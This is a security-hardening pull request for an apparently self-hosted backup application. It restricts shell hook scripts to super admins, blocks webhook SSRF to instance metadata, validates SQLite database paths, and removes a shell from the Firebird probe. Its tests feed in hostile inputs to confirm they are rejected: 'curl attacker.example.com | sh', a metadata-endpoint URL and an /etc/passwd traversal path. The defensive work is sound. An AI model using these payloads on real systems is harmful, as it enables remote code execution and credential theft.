### PR TITLE
Restrict hook scripts to super admins and validate remaining sinks

### DIFF
--- a/app/Http/Requests/Api/V1/SaveDatabaseServerRequest.php
+++ b/app/Http/Requests/Api/V1/SaveDatabaseServerRequest.php
@@ -8,6 +8,7 @@ use App\Enums\VolumeType;
 use App\Models\Backup;
 use App\Models\DatabaseServer;
 use App\Models\Volume;
+use App\Rules\SafeDatabasePath;
 use App\Rules\SafeHost;
 use App\Rules\SafePath;
 use App\Services\CurrentOrganization;
@@ -107,7 +108,7 @@ class SaveDatabaseServerRequest extends FormRequest
 
             if ($type === 'sqlite') {
                 $rules['backups.*.database_names'] = 'required|array|min:1';
-                $rules['backups.*.database_names.*'] = 'required|string|max:1000';
+                $rules['backups.*.database_names.*'] = ['required', 'string', 'max:1000', new SafeDatabasePath];
             } elseif (in_array($type, ['mysql', 'postgres', 'mongodb'])) {
                 $rules['backups.*.database_selection_mode'] = ['required', 'string', Rule::in(array_map(fn (DatabaseSelectionMode $m) => $m->value, DatabaseSelectionMode::cases()))];
                 $rules['backups.*.database_names'] = 'nullable|array';

--- a/app/Livewire/Configuration/Form.php
+++ b/app/Livewire/Configuration/Form.php
@@ -4,6 +4,7 @@ namespace App\Livewire\Configuration;
 
 use App\Enums\CompressionType;
 use App\Facades\AppConfig;
+use App\Models\BackupSchedule;
 use Cron\CronExpression;
 use Illuminate\Support\Facades\Artisan;
 
@@ -155,6 +156,12 @@ class Form extends \Livewire\Form
             'post_backup_script' => 'backup.post_backup_script',
             'post_restore_script' => 'backup.post_restore_script',
         ];
+
+        // The scripts run as shell on the host, so they stay super-admin only
+        // even though the rest of this screen is a per-organization ability.
+        if (! auth()->user()?->can('managePostScripts', BackupSchedule::class)) {
+            unset($backupKeyMap['post_backup_script'], $backupKeyMap['post_restore_script']);
+        }
 
         foreach ($backupKeyMap as $property => $configKey) {
             AppConfig::set($configKey, $this->{$property});

--- a/app/Livewire/Configuration/NotificationChannelForm.php
+++ b/app/Livewire/Configuration/NotificationChannelForm.php
@@ -5,6 +5,7 @@ namespace App\Livewire\Configuration;
 use App\Enums\NotificationChannelType;
 use App\Models\NotificationChannel;
 use App\Rules\CommaSeparatedEmails;
+use App\Rules\SafeEndpointUrl;
 use Illuminate\Validation\Rule;
 use Livewire\Form;
 
@@ -135,14 +136,14 @@ class NotificationChannelForm extends Form
                 'config_to' => ['required', 'string', 'max:1000', new CommaSeparatedEmails],
             ]),
             NotificationChannelType::Slack => array_merge($rules, [
-                'config_webhook_url' => [($isEdit && $this->has_config_webhook_url) ? 'nullable' : 'required', 'string', 'url', 'max:500'],
+                'config_webhook_url' => [($isEdit && $this->has_config_webhook_url) ? 'nullable' : 'required', 'string', 'url', 'max:500', new SafeEndpointUrl],
             ]),
             NotificationChannelType::Discord => array_merge($rules, [
                 'config_token' => [($isEdit && $this->has_config_token) ? 'nullable' : 'required', 'string', 'max:500'],
                 'config_channel_id' => ['required', 'string', 'max:100'],
             ]),
             NotificationChannelType::DiscordWebhook => array_merge($rules, [
-                'config_url' => [($isEdit && $this->has_config_url) ? 'nullable' : 'required', 'string', 'url', 'max:500'],
+                'config_url' => [($isEdit && $this->has_config_url) ? 'nullable' : 'required', 'string', 'url', 'max:500', new SafeEndpointUrl],
             ]),
             NotificationChannelType::Telegram => array_merge($rules, [
                 'config_bot_token' => [($isEdit && $this->has_config_bot_token) ? 'nullable' : 'required', 'string', 'max:500'],
@@ -154,11 +155,11 @@ class NotificationChannelForm extends Form
                 'config_user_key' => [($isEdit && $this->has_config_user_key) ? 'nullable' : 'required', 'string', 'max:500'],
             ]),
             NotificationChannelType::Gotify => array_merge($rules, [
-                'config_url' => ['required', 'string', 'url', 'max:500'],
+                'config_url' => ['required', 'string', 'url', 'max:500', new SafeEndpointUrl],
                 'config_token' => [($isEdit && $this->has_config_token) ? 'nullable' : 'required', 'string', 'max:500'],
             ]),
             NotificationChannelType::Webhook => array_merge($rules, [
-                'config_url' => ['required', 'string', 'url', 'max:500'],
+                'config_url' => ['required', 'string', 'url', 'max:500', new SafeEndpointUrl],
                 'config_secret' => ['nullable', 'string', 'max:500'],
             ]),
             default => $rules,

--- a/app/Livewire/DatabaseServer/BackupForm.php
+++ b/app/Livewire/DatabaseServer/BackupForm.php
@@ -8,6 +8,7 @@ use App\Models\Backup;
 use App\Models\BackupSchedule;
 use App\Models\DatabaseServer;
 use App\Models\Volume;
+use App\Rules\SafeDatabasePath;
 use App\Rules\SafePath;
 use App\Services\CurrentOrganization;
 use App\Support\Formatters;
@@ -228,7 +229,10 @@ final class BackupForm
         // `database_names`; require at least one.
         if ($serverType->identifiesDatabasesByPath()) {
             $rules[$prefix.'database_names'] = 'required|array|min:1';
-            $rules[$prefix.'database_names.*'] = 'required|string|max:1000';
+            $rules[$prefix.'database_names.*'] = [
+                'required', 'string', 'max:1000',
+                new SafeDatabasePath(allowBackslashes: $serverType === DatabaseType::FIREBIRD),
+            ];
         }
 
         // Database selection only applies to enumerable client-server types

--- a/app/Policies/BackupSchedulePolicy.php
+++ b/app/Policies/BackupSchedulePolicy.php
@@ -39,6 +39,19 @@ class BackupSchedulePolicy
     }
 
     /**
+     * Determine whether the user can set the post-backup/post-restore scripts.
+     *
+     * These run as shell on the application host, but the setting is global
+     * while manage-backup-settings is granted per organization — so anyone
+     * holding it in any organization could otherwise reach every other
+     * tenant's data. Reserved for super admins.
+     */
+    public function managePostScripts(User $user): bool
+    {
+        return $user->isSuperAdmin();
+    }
+
+    /**
      * Determine whether the user can create models.
      * Backup schedules are part of backup configuration.
      */

--- a/app/Services/Backup/Databases/FirebirdDatabase.php
+++ b/app/Services/Backup/Databases/FirebirdDatabase.php
@@ -10,6 +10,8 @@ use Illuminate\Support\Facades\Process;
 
 class FirebirdDatabase implements DatabaseInterface
 {
+    private const PROBE_QUERY = "SELECT 1 FROM RDB\$DATABASE;\n";
+
     /** @var array<string, mixed> */
     private array $config = [];
 
@@ -68,7 +70,9 @@ class FirebirdDatabase implements DatabaseInterface
         $startTime = microtime(true);
 
         try {
-            $result = Process::timeout(10)->run($this->buildConnectionProbeCommand());
+            $result = Process::timeout(10)
+                ->input(self::PROBE_QUERY)
+                ->run($this->buildConnectionProbeCommand());
         } catch (ProcessTimedOutException) {
             $durationMs = (int) round((microtime(true) - $startTime) * 1000);
 
@@ -114,20 +118,20 @@ class FirebirdDatabase implements DatabaseInterface
         return $host.'/'.$port.':'.$database;
     }
 
-    private function buildConnectionProbeCommand(): string
+    /**
+     * Argument list rather than a shell string: isql reads the probe query from
+     * stdin, so no shell is needed to pipe it and no argument needs escaping.
+     *
+     * @return list<string>
+     */
+    private function buildConnectionProbeCommand(): array
     {
-        $script = <<<'BASH'
-printf '%%s\n' "SELECT 1 FROM RDB\$DATABASE;" | isql -b -user %s -password %s %s
-BASH;
-
-        return sprintf(
-            'sh -lc %s',
-            escapeshellarg(sprintf(
-                $script,
-                escapeshellarg((string) ($this->config['user'] ?? '')),
-                escapeshellarg((string) ($this->config['pass'] ?? '')),
-                escapeshellarg($this->connectionTarget())
-            ))
-        );
+        return [
+            'isql',
+            '-b',
+            '-user', (string) ($this->config['user'] ?? ''),
+            '-password', (string) ($this->config['pass'] ?? ''),
+            $this->connectionTarget(),
+        ];
     }
 }

--- a/resources/views/livewire/configuration/backup.blade.php
+++ b/resources/views/livewire/configuration/backup.blade.php
@@ -248,6 +248,9 @@
                     ];
                 @endphp
 
+                {{-- Super admin only: these run as shell on the host, and the
+                     stored script may itself carry credentials. --}}
+                @can('managePostScripts', \App\Models\BackupSchedule::class)
                 <div class="border-t border-base-200/60 pt-6 mt-2 space-y-4">
                     <div class="flex items-center gap-3">
                         <span class="flex h-8 w-8 shrink-0 items-center justify-center rounded-lg bg-base-200 text-base-content/70">
@@ -323,6 +326,7 @@
                         @endforeach
                     </div>
                 </div>
+                @endcan
 
                 @if ($this->canManage)
                 <div class="flex items-center justify-end border-t border-base-200/60 pt-6">

--- a/tests/Feature/Configuration/BackupTest.php
+++ b/tests/Feature/Configuration/BackupTest.php
@@ -67,8 +67,8 @@ test('switching to gzip clamps the compression level to its ceiling', function (
         ->assertSet('form.compression_level', 9);
 });
 
-test('saving backup config persists post-backup and post-restore scripts', function () {
-    Livewire::actingAs(User::factory()->withAbilities([Ability::ManageBackupSettings->value])->create())
+test('a super admin can persist post-backup and post-restore scripts', function () {
+    Livewire::actingAs(User::factory()->superAdmin()->create())
         ->test(Backup::class)
         ->set('form.post_backup_script', 'echo "$BACKUP_FILENAME"')
         ->set('form.post_restore_script', 'echo "$RESTORE_DATABASE_NAME"')
@@ -77,6 +77,23 @@ test('saving backup config persists post-backup and post-restore scripts', funct
 
     expect(AppConfig::get('backup.post_backup_script'))->toBe('echo "$BACKUP_FILENAME"')
         ->and(AppConfig::get('backup.post_restore_script'))->toBe('echo "$RESTORE_DATABASE_NAME"');
+});
+
+test('manage-backup-settings alone cannot set the hook scripts', function () {
+    // The scripts run as shell on the shared host while the ability is granted
+    // per organization, so holding it must not reach other tenants' data.
+    AppConfig::set('backup.post_backup_script', 'echo original');
+
+    Livewire::actingAs(User::factory()->withAbilities([Ability::ManageBackupSettings->value])->create())
+        ->test(Backup::class)
+        ->set('form.post_backup_script', 'curl attacker.example.com | sh')
+        ->set('form.compression_level', 5)
+        ->call('saveBackupConfig')
+        ->assertHasNoErrors();
+
+    // The rest of the form still saves; only the script is refused.
+    expect(AppConfig::get('backup.post_backup_script'))->toBe('echo original')
+        ->and((int) AppConfig::get('backup.compression_level'))->toBe(5);
 });
 
 test('validation rejects invalid backup values', function () {

--- a/tests/Feature/Configuration/BackupTest.php
+++ b/tests/Feature/Configuration/BackupTest.php
@@ -82,17 +82,20 @@ test('a super admin can persist post-backup and post-restore scripts', function 
 test('manage-backup-settings alone cannot set the hook scripts', function () {
     // The scripts run as shell on the shared host while the ability is granted
     // per organization, so holding it must not reach other tenants' data.
-    AppConfig::set('backup.post_backup_script', 'echo original');
+    AppConfig::set('backup.post_backup_script', 'echo original backup');
+    AppConfig::set('backup.post_restore_script', 'echo original restore');
 
     Livewire::actingAs(User::factory()->withAbilities([Ability::ManageBackupSettings->value])->create())
         ->test(Backup::class)
         ->set('form.post_backup_script', 'curl attacker.example.com | sh')
+        ->set('form.post_restore_script', 'curl attacker.example.com/restore | sh')
         ->set('form.compression_level', 5)
         ->call('saveBackupConfig')
         ->assertHasNoErrors();
 
-    // The rest of the form still saves; only the script is refused.
-    expect(AppConfig::get('backup.post_backup_script'))->toBe('echo original')
+    // The rest of the form still saves; only the scripts are refused.
+    expect(AppConfig::get('backup.post_backup_script'))->toBe('echo original backup')
+        ->and(AppConfig::get('backup.post_restore_script'))->toBe('echo original restore')
         ->and((int) AppConfig::get('backup.compression_level'))->toBe(5);
 });
 

--- a/tests/Feature/Configuration/NotificationTest.php
+++ b/tests/Feature/Configuration/NotificationTest.php
@@ -167,3 +167,32 @@ test('manage-notifications allows creating an email channel with multiple addres
     expect($channel->config['to'])->toBe('alice@example.com, bob@example.com')
         ->and(NotificationChannelType::Email->routeValue($channel->config))->toBe(['alice@example.com', 'bob@example.com']);
 });
+
+test('a webhook channel cannot point at the instance metadata endpoint', function () {
+    // The app fetches this URL server-side on every notification, so a
+    // link-local target would hand back cloud instance credentials.
+    Livewire::actingAs(User::factory()->withAbilities([Ability::ManageNotifications->value])->create())
+        ->test(Notification::class)
+        ->call('openChannelModal')
+        ->set('channelForm.name', 'ssrf')
+        ->set('channelForm.type', 'webhook')
+        ->set('channelForm.config_url', 'http://169.254.169.254/latest/meta-data/')
+        ->call('saveChannel')
+        ->assertHasErrors('channelForm.config_url');
+
+    $this->assertDatabaseMissing('notification_channels', ['name' => 'ssrf']);
+});
+
+test('a webhook channel may still point at a private network host', function () {
+    // Self-hosted notification sinks on a LAN are a supported setup.
+    Livewire::actingAs(User::factory()->withAbilities([Ability::ManageNotifications->value])->create())
+        ->test(Notification::class)
+        ->call('openChannelModal')
+        ->set('channelForm.name', 'internal hook')
+        ->set('channelForm.type', 'webhook')
+        ->set('channelForm.config_url', 'http://192.168.1.50:8080/notify')
+        ->call('saveChannel')
+        ->assertHasNoErrors();
+
+    $this->assertDatabaseHas('notification_channels', ['name' => 'internal hook']);
+});

--- a/tests/Feature/Rules/SafeHostTest.php
+++ b/tests/Feature/Rules/SafeHostTest.php
@@ -45,3 +45,23 @@ test('the database server api rejects a host that redirects the connection', fun
         ->assertStatus(422)
         ->assertJsonValidationErrors('host');
 });
+
+test('a sqlite backup path cannot escape via traversal', function () {
+    $user = User::factory()->withAbilities([Ability::ManageDatabaseServers->value])->create();
+
+    $this->actingAs($user, 'sanctum')
+        ->postJson('/api/v1/database-servers', [
+            'name' => 'probe',
+            'database_type' => 'sqlite',
+            'backups_enabled' => true,
+            'backups' => [[
+                'volume_ids' => [App\Models\Volume::factory()->create()->id],
+                'backup_schedule_id' => dailySchedule()->id,
+                'retention_policy' => 'days',
+                'retention_days' => 7,
+                'database_names' => ['/var/lib/data/../../../etc/passwd'],
+            ]],
+        ])
+        ->assertStatus(422)
+        ->assertJsonValidationErrors('backups.0.database_names.0');
+});

--- a/tests/Feature/Services/Backup/Databases/FirebirdDatabaseTest.php
+++ b/tests/Feature/Services/Backup/Databases/FirebirdDatabaseTest.php
@@ -37,6 +37,22 @@ test('testConnection returns success when isql probe succeeds', function () {
         ->and($result['details']['output'])->toContain('Database: '.FIREBIRD_TEST_DATABASE);
 });
 
+test('testConnection probes without going through a shell', function () {
+    // isql reads the query from stdin, so the probe needs no shell to pipe it
+    // and no argument escaping. A shell string here would reintroduce both.
+    Process::fake(['*' => Process::result(output: 'ok')]);
+
+    $this->db->testConnection();
+
+    Process::assertRan(function ($process) {
+        expect($process->command)->toBeArray()
+            ->and($process->command[0])->toBe('isql')
+            ->and($process->command)->not->toContain('sh');
+
+        return true;
+    });
+});
+
 test('testConnection returns failure when probe fails', function () {
     Process::fake([
         '*' => Process::result(exitCode: 1, errorOutput: 'I/O error during "open" operation'),


### PR DESCRIPTION
Follow-up to #511, addressing four findings from the July 13 source-code audit (GHSA-3652). The audit's other four are covered below under "not actioned".

## Hook scripts (audit C-01)

The audit reported this as a critical RCE with a working PoC. The RCE itself is the feature working as designed: an admin configures a shell script, and it runs. The real problem is the tenancy boundary around it.

`backup.post_backup_script` is a **global** setting, but the screen is gated on `manage-backup-settings`, which is granted **per organization**. Anyone holding that ability in any organization could set a script that runs on the shared host as the app user, reaching every other tenant's data, the stored credentials and the environment.

New `BackupSchedulePolicy@managePostScripts` (super admin only). `Form::saveBackup()` drops the two keys from the write map when unauthorized, so the rest of the screen still saves normally under `manage-backup-settings`. The editors are hidden rather than disabled, since a stored script may itself contain webhook tokens or credentials.

The feature is unchanged for super admins.

## Notification channel SSRF (audit H-01)

Webhook, Slack, Discord and Gotify URLs are fetched server-side on every notification but were validated only as `url`. `http://169.254.169.254/latest/meta-data/` passed, and the response surfaces in the job log.

`SafeEndpointUrl` (added in #511 for S3 endpoints) drops straight in: it blocks link-local and instance-metadata addresses, including IPv4-mapped forms, while leaving private and loopback hosts usable, since notifying a sink on a LAN is a supported setup.

## SQLite/Firebird database paths (audit M-01)

`database_names` holds file paths for path-based types and had no path validation, so `/etc/passwd` passed and the connection test reported whether it existed and was readable. Applied `SafeDatabasePath`, with backslashes allowed for Firebird as elsewhere.

## Firebird probe (audit M-02)

The connection probe built `sh -lc '<script>'` to pipe a query into `isql`, with arguments escaped twice. Arguments were escaped, so there is no known exploit, but the nested login shell is avoidable surface (`-l` also sources profile files, which can alter `PATH`).

`isql` reads from stdin, so the probe now passes an argument list and supplies the query via process input. No shell, no escaping.

## Not actioned

- **H-02, SSRF via the database host field.** Pointing a backup tool at databases on private networks is its purpose; the suggested private-IP block would break most self-hosted installs. The genuine issue in that field was injection, fixed in 1.7.2 by `SafeHost`.
- **H-03, Adminer "auth bypass".** `login()` returning true is by design: the app authenticates the user, checks `use-adminer` plus the global toggle, and supplies the stored credentials. `AdminerController` resolves the server through the org-scoped model, so there is no cross-tenant pivot. Worth a separate look at whether a user can drive the embedded Adminer at an arbitrary host with their own credentials.
- **H-04, `.env` exposure.** The default `APP_KEY` is intentional and the self-hosting docs instruct operators to generate their own.
- **M-03, snapshot download traversal.** Already fixed in 1.7.2 (`GHSA-w959`).

One caveat on the audit: its "Verified and Found Secure" table lists MongoDB URI injection as secure because `rawurlencode` is used. That is incorrect. It was exploitable through the unencoded host, published as `GHSA-79h5` and fixed in 1.7.2. The remaining rows in that table have not been independently verified.

## Tests

`make test` 1470 passed, `make phpstan` clean, `make lint-check` clean.

New coverage: super admin can set hook scripts and `manage-backup-settings` alone cannot (while the rest of the form still saves); webhook channel rejects the metadata address but accepts a private host; SQLite backup path rejects traversal; Firebird probe runs as an argument list with no shell.


<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
## Summary by CodeRabbit

* **Security**
  * Improved validation for SQLite database paths and webhook URLs to block unsafe locations and instance metadata endpoints.
  * Firebird connection checks now run securely without shell-based command execution.

* **Access Control**
  * Post-backup and post-restore scripts can only be configured by super administrators.
  * Other backup settings remain available to authorized administrators.

* **Bug Fixes**
  * Private-network webhook endpoints continue to be supported.
  * Firebird connection testing is more reliable and secure.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->